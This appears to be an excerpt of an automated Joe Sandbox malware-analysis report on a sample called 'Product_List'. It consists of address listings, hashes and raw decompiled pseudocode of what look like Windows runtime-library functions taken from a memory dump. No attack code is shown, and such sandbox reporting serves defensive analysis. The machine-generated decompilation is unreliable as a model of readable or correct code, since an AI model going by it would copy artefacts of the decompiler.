                                                      0x01792866
                                                      0x01792866
                                                      0x01792876
                                                      0x01792879
                                                      0x00000000
                                                      0x00000000
                                                      0x017927e0
                                                      0x017927e7
                                                      0x017927e9
                                                      0x017927eb
                                                      0x017d5afd
                                                      0x00000000
                                                      0x017d5afd
                                                      0x00000000
                                                      0x00000000
                                                      0x01792633
                                                      0x01792638
                                                      0x0179263b
                                                      0x0179263c
                                                      0x0179263e
                                                      0x01792640
                                                      0x01792642
                                                      0x01792647
                                                      0x01792649
                                                      0x0179264e
                                                      0x01792650
                                                      0x01792653
                                                      0x01792659
                                                      0x017926a2
                                                      0x017926a7
                                                      0x017926ac
                                                      0x017926b2
                                                      0x017d5b11
                                                      0x017d5b15
                                                      0x017d5b17
                                                      0x00000000
                                                      0x017926b8
                                                      0x017926b8
                                                      0x017926ba
                                                      0x017927a6
                                                      0x017927a6
                                                      0x017927a9
                                                      0x017927ab
                                                      0x017927b9
                                                      0x017927b9
                                                      0x017927be
                                                      0x017927c1
                                                      0x017927c3
                                                      0x017927c5
                                                      0x017927c7
                                                      0x017d5c74
                                                      0x017d5c79
                                                      0x017d5c79
                                                      0x017927c7
                                                      0x00000000
                                                      0x017926c0
                                                      0x017926c0
                                                      0x017926c3
                                                      0x017926c6
                                                      0x017926c6
                                                      0x017926c9
                                                      0x017926c9
                                                      0x00000000
                                                      0x017926c9
                                                      0x017926ba
                                                      0x0179265b
                                                      0x0179265b
                                                      0x0179265e
                                                      0x01792667
                                                      0x0179266d
                                                      0x01792677
                                                      0x0179267c
                                                      0x0179267f
                                                      0x01792681
                                                      0x017d5b49
                                                      0x017d5b4e
                                                      0x017927cd
                                                      0x017927d0
                                                      0x017927d1
                                                      0x017927d2
                                                      0x017927d4
                                                      0x017927dd
                                                      0x01792687
                                                      0x01792687
                                                      0x0179268a
                                                      0x0179268b
                                                      0x0179268e
                                                      0x0179268f
                                                      0x01792691
                                                      0x01792696
                                                      0x01792698
                                                      0x0179269d
                                                      0x0179269f
                                                      0x00000000
                                                      0x0179269f
                                                      0x01792681
                                                      0x00000000
                                                      0x00000000
                                                      0x01792846
                                                      0x00000000
                                                      0x00000000
                                                      0x01792605
                                                      0x0179260a
                                                      0x0179260c
                                                      0x01792611
                                                      0x01792616
                                                      0x01792619
                                                      0x01792619
                                                      0x0179261e
                                                      0x00000000
                                                      0x01792624
                                                      0x01792627
                                                      0x01792627
                                                      0x00000000
                                                      0x00000000
                                                      0x017d5b1f
                                                      0x00000000
                                                      0x00000000
                                                      0x01792894
                                                      0x0179289b
                                                      0x0179289d
                                                      0x017928a1
                                                      0x017d5b2b
                                                      0x017d5b2e
                                                      0x017d5b2e
                                                      0x017928a7
                                                      0x017928a9
                                                      0x017d5b04
                                                      0x017d5b09
                                                      0x017d5b09
                                                      0x017d5b09
                                                      0x00000000
                                                      0x00000000
                                                      0x017d5b35
                                                      0x017d5b3c
                                                      0x017928fb
                                                      0x017928fb
                                                      0x017926cc
                                                      0x017926cc
                                                      0x017926d0
                                                      0x00000000
                                                      0x017926d2
                                                      0x017926d2
                                                      0x00000000
                                                      0x017926d2
                                                      0x00000000
                                                      0x00000000
                                                      0x017925fe
                                                      0x0179292d
                                                      0x0179292f
                                                      0x01792930
                                                      0x01792935
                                                      0x01792937
                                                      0x01792939
                                                      0x01792939
                                                      0x0179293a
                                                      0x0179293a
                                                      0x0179293a
                                                      0x0179293d
                                                      0x0179293f
                                                      0x01792941
                                                      0x01792941
                                                      0x01792942
                                                      0x01792945
                                                      0x01792945
                                                      0x01792945
                                                      0x01792946
                                                      0x01792949
                                                      0x01792949
                                                      0x0179294e
                                                      0x0179294f
                                                      0x01792951
                                                      0x01792951
                                                      0x01792952
                                                      0x01792955
                                                      0x0179295a
                                                      0x0179295d
                                                      0x01792960
                                                      0x01792960
                                                      0x01792962
                                                      0x01792963
                                                      0x01792965
                                                      0x01792965
                                                      0x01792966
                                                      0x01792969
                                                      0x0179296a
                                                      0x0179296a
                                                      0x0179296a
                                                      0x0179296e
                                                      0x0179296f
                                                      0x01792971
                                                      0x01792971
                                                      0x01792972
                                                      0x01792973
                                                      0x01792975
                                                      0x01792975
                                                      0x01792976
                                                      0x01792976
                                                      0x01792976
                                                      0x01792976
                                                      0x00000000

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: PATH
                                                      • API String ID: 0-1036084923
                                                      • Opcode ID: bf6bfb03756766704a1fff68adb1f891725695621b778812e3aa183da9121778
                                                      • Instruction ID: 2723e81a9ba3e0add08891d57a1c77011f7e327d180fee16603bcc782c88a3d8
                                                      • Opcode Fuzzy Hash: bf6bfb03756766704a1fff68adb1f891725695621b778812e3aa183da9121778
                                                      • Instruction Fuzzy Hash: DCC19F71D00219EBDF24EF99E880BADFBB5FF48710F544069EA01BB255D734A945CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0179FAB0 Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 80%
                                                      			E0179FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					L0177EEF0(0x1857b60);
					_t134 =  *0x1857b84; // 0x77e17b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1857b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1857b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E01776D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														L017776E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E01808938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E0176B150();
													}
													_t116 = E01806D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E017775CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x1858638; // 0x0
																	_t122 = L017738A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			L017776E2(_t154);
																			goto L41;
																		}
																	} else {
																		L017776E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L0179FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L017770F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E0179FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E0179FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E0179FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E0179FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E0179FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x1857b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x1857b84 = _t75;
						_t73 = E0177EB70(_t134, 0x1857b60);
						if( *0x1857b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = L0177FF60( *0x1857b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                      0x0179fab0
                                                      0x0179fab2
                                                      0x0179fab3
                                                      0x0179fab4
                                                      0x0179fabc
                                                      0x0179fac0
                                                      0x0179fb14
                                                      0x0179fb17
                                                      0x0179fac2
                                                      0x0179fac8
                                                      0x0179facd
                                                      0x0179fad3
                                                      0x0179fad3
                                                      0x0179fadd
                                                      0x0179fb18
                                                      0x0179fb1b
                                                      0x0179fb1d
                                                      0x0179fb1e
                                                      0x0179fb1f
                                                      0x0179fb20
                                                      0x0179fb21
                                                      0x0179fb22
                                                      0x0179fb23
                                                      0x0179fb24
                                                      0x0179fb25
                                                      0x0179fb26
                                                      0x0179fb27
                                                      0x0179fb28
                                                      0x0179fb29
                                                      0x0179fb2a
                                                      0x0179fb2b
                                                      0x0179fb2c
                                                      0x0179fb2d
                                                      0x0179fb2e
                                                      0x0179fb2f
                                                      0x0179fb3a
                                                      0x0179fb3b
                                                      0x0179fb3e
                                                      0x0179fb41
                                                      0x0179fb44
                                                      0x0179fb47
                                                      0x0179fb4a
                                                      0x0179fb4d
                                                      0x0179fb53
                                                      0x017dbdcb
                                                      0x017dbdcb
                                                      0x0179fb59
                                                      0x0179fb5b
                                                      0x0179fb5b
                                                      0x0179fb5e
                                                      0x017dbdd5
                                                      0x017dbdd8
                                                      0x00000000
                                                      0x017dbdda
                                                      0x00000000
                                                      0x017dbdda
                                                      0x0179fb64
                                                      0x0179fb64
                                                      0x0179fb64
                                                      0x0179fb67
                                                      0x0179fb6e
                                                      0x0179fb70
                                                      0x0179fb72
                                                      0x00000000
                                                      0x0179fb78
                                                      0x0179fb7a
                                                      0x0179fb7a
                                                      0x0179fb7d
                                                      0x0179fb80
                                                      0x017dbddf
                                                      0x017dbde1
                                                      0x00000000
                                                      0x017dbde3
                                                      0x00000000
                                                      0x017dbde3
                                                      0x0179fb86
                                                      0x0179fb86
                                                      0x0179fb86
                                                      0x0179fb8b
                                                      0x0179fb90
                                                      0x0179fb92
                                                      0x0179fb94
                                                      0x0179fb9a
                                                      0x0179fb9b
                                                      0x0179fba1
                                                      0x017dbde8
                                                      0x017dbdeb
                                                      0x017dbded
                                                      0x017dbeb5
                                                      0x017dbeb5
                                                      0x017dbebb
                                                      0x017dbebd
                                                      0x017dbec3
                                                      0x017dbed2
                                                      0x017dbedd
                                                      0x017dbedd
                                                      0x017dbeed
                                                      0x00000000
                                                      0x017dbdf3
                                                      0x017dbdfe
                                                      0x017dbe06
                                                      0x017dbe0b
                                                      0x017dbe0d
                                                      0x017dbe0f
                                                      0x017dbe14
                                                      0x017dbe19
                                                      0x017dbe20
                                                      0x017dbe25
                                                      0x017dbe27
                                                      0x017dbe35
                                                      0x017dbe39
                                                      0x017dbe46
                                                      0x017dbe4f
                                                      0x017dbe54
                                                      0x017dbe56
                                                      0x017dbef8
                                                      0x017dbef8
                                                      0x00000000
                                                      0x017dbe5c
                                                      0x017dbe5c
                                                      0x017dbe60
                                                      0x00000000
                                                      0x017dbe66
                                                      0x017dbe66
                                                      0x017dbe7f
                                                      0x017dbe84
                                                      0x017dbe87
                                                      0x017dbe89
                                                      0x017dbe8b
                                                      0x017dbe99
                                                      0x017dbe9d
                                                      0x017dbea0
                                                      0x017dbeac
                                                      0x017dbeaf
                                                      0x017dbeb1
                                                      0x017dbeb3
                                                      0x017dbeb3
                                                      0x00000000
                                                      0x017dbea2
                                                      0x017dbea2
                                                      0x00000000
                                                      0x017dbea2
                                                      0x017dbe8d
                                                      0x017dbe8d
                                                      0x017dbe92
                                                      0x00000000
                                                      0x017dbe92
                                                      0x017dbe8b
                                                      0x017dbe60
                                                      0x017dbe3b
                                                      0x017dbe3b
                                                      0x017dbe3e
                                                      0x00000000
                                                      0x017dbe40
                                                      0x017dbe40
                                                      0x017dbe44
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017dbe44
                                                      0x017dbe3e
                                                      0x017dbe29
                                                      0x017dbe29
                                                      0x00000000
                                                      0x017dbe29
                                                      0x017dbe27
                                                      0x00000000
                                                      0x0179fba7
                                                      0x0179fba7
                                                      0x0179fbab
                                                      0x017dbf02
                                                      0x0179fbb1
                                                      0x0179fbb1
                                                      0x0179fbb8
                                                      0x0179fbbd
                                                      0x0179fbbd
                                                      0x0179fbbf
                                                      0x0179fbbf
                                                      0x0179fbc5
                                                      0x0179fbcb
                                                      0x0179fbf8
                                                      0x0179fbf8
                                                      0x0179fbfa
                                                      0x00000000
                                                      0x0179fc00
                                                      0x0179fc00
                                                      0x0179fc03
                                                      0x00000000
                                                      0x0179fc09
                                                      0x0179fc09
                                                      0x0179fc0f
                                                      0x0179fc15
                                                      0x0179fc23
                                                      0x0179fc23
                                                      0x0179fc25
                                                      0x0179fc27
                                                      0x0179fc75
                                                      0x0179fc7c
                                                      0x0179fc84
                                                      0x00000000
                                                      0x0179fc29
                                                      0x0179fc29
                                                      0x0179fc2d
                                                      0x0179fc30
                                                      0x017dbf0f
                                                      0x00000000
                                                      0x0179fc36
                                                      0x0179fc38
                                                      0x0179fc3b
                                                      0x0179fc41
                                                      0x017dbf17
                                                      0x017dbf19
                                                      0x017dbf48
                                                      0x017dbf4b
                                                      0x00000000
                                                      0x017dbf1b
                                                      0x017dbf22
                                                      0x017dbf24
                                                      0x017dbf26
                                                      0x00000000
                                                      0x017dbf2c
                                                      0x017dbf37
                                                      0x017dbf39
                                                      0x017dbf3b
                                                      0x00000000
                                                      0x017dbf41
                                                      0x017dbf41
                                                      0x017dbf41
                                                      0x017dbf41
                                                      0x017dbf45
                                                      0x00000000
                                                      0x017dbf45
                                                      0x017dbf3b
                                                      0x017dbf26
                                                      0x00000000
                                                      0x0179fc47
                                                      0x0179fc47
                                                      0x0179fc49
                                                      0x0179fcb2
                                                      0x0179fcb4
                                                      0x0179fcb6
                                                      0x0179fcdc
                                                      0x0179fcdc
                                                      0x00000000
                                                      0x0179fcb8
                                                      0x0179fcc3
                                                      0x0179fcc5
                                                      0x0179fcc7
                                                      0x00000000
                                                      0x0179fcc9
                                                      0x0179fcc9
                                                      0x0179fccd
                                                      0x00000000
                                                      0x0179fccd
                                                      0x0179fcc7
                                                      0x00000000
                                                      0x0179fc4b
                                                      0x0179fc4b
                                                      0x0179fc4e
                                                      0x0179fc4e
                                                      0x0179fc51
                                                      0x0179fc51
                                                      0x0179fc54
                                                      0x0179fc5a
                                                      0x0179fc5c
                                                      0x0179fc5f
                                                      0x0179fc61
                                                      0x0179fc63
                                                      0x0179fc65
                                                      0x0179fc67
                                                      0x0179fc6e
                                                      0x0179fc72
                                                      0x0179fc72
                                                      0x0179fc72
                                                      0x0179fc72
                                                      0x0179fc67
                                                      0x0179fc61
                                                      0x00000000
                                                      0x0179fc5a
                                                      0x0179fc49
                                                      0x0179fc41
                                                      0x0179fc30
                                                      0x0179fc27
                                                      0x0179fc03
                                                      0x0179fbcd
                                                      0x0179fbd3
                                                      0x0179fbd9
                                                      0x0179fbdc
                                                      0x0179fbde
                                                      0x0179fc99
                                                      0x0179fc9b
                                                      0x0179fc9d
                                                      0x0179fcd5
                                                      0x0179fcd5
                                                      0x0179fc89
                                                      0x0179fc89
                                                      0x00000000
                                                      0x0179fc9f
                                                      0x0179fc9f
                                                      0x0179fca3
                                                      0x00000000
                                                      0x0179fca3
                                                      0x00000000
                                                      0x0179fbe4
                                                      0x0179fbe4
                                                      0x0179fbe4
                                                      0x0179fbe4
                                                      0x0179fbe9
                                                      0x0179fbf2
                                                      0x00000000
                                                      0x0179fbf2
                                                      0x0179fbde
                                                      0x0179fbcb
                                                      0x0179fbab
                                                      0x0179fc8b
                                                      0x0179fc8b
                                                      0x0179fc8c
                                                      0x0179fb80
                                                      0x0179fb72
                                                      0x0179fb5e
                                                      0x0179fc8d
                                                      0x0179fc91
                                                      0x0179fadf
                                                      0x0179fadf
                                                      0x0179fae1
                                                      0x0179fae4
                                                      0x0179fae7
                                                      0x0179faec
                                                      0x0179faf8
                                                      0x0179fb00
                                                      0x0179fb07
                                                      0x0179fb0f
                                                      0x0179fb0f
                                                      0x0179fb07
                                                      0x00000000
                                                      0x0179faf8
                                                      0x0179fadd

                                                      Strings
                                                      • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 017DBE0F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                      • API String ID: 0-865735534
                                                      • Opcode ID: 582f95d2fa2de850c8cbfe2ad90d5529f9737fe571900674f5a078eb611e671a
                                                      • Instruction ID: 21f46cde62df3de4ec3f1a36f25c5b7e22bb374042773b6f71998992b64b970d
                                                      • Opcode Fuzzy Hash: 582f95d2fa2de850c8cbfe2ad90d5529f9737fe571900674f5a078eb611e671a
                                                      • Instruction Fuzzy Hash: 77A12631B006468BEF25DF68D454B7AFBB5AF4A710F05856AEA06CB681DB30D849CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01762D8A Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 63%
                                                      			E01762D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x1855350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x1857bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					L017A97C0();
				}
				if( *0x18579c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x18579c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						L01791624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E01787D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							L017FFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E017A9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0179E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L017BDF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x1856901;
								_push(_t109);
								_v52 = _t98;
								if( *0x1856901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E017A9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E017A95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E01787D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E01787D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E017E7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E017FFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x1855350;
							if(_t109 != 0x1855350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									L017FFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						L017F5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                      0x01762d8a
                                                      0x01762d8a
                                                      0x01762d92
                                                      0x01762d96
                                                      0x01762d9e
                                                      0x01762da0
                                                      0x01762da3
                                                      0x01762da5
                                                      0x01762da8
                                                      0x01762dab
                                                      0x01762db2
                                                      0x017bf9aa
                                                      0x017bf9ab
                                                      0x017bf9ae
                                                      0x017bf9ae
                                                      0x01762db8
                                                      0x01762dc2
                                                      0x017bf9b9
                                                      0x017bf9be
                                                      0x017bf9bf
                                                      0x017bf9bf
                                                      0x01762dcf
                                                      0x017bf9c9
                                                      0x01762dd5
                                                      0x01762dd5
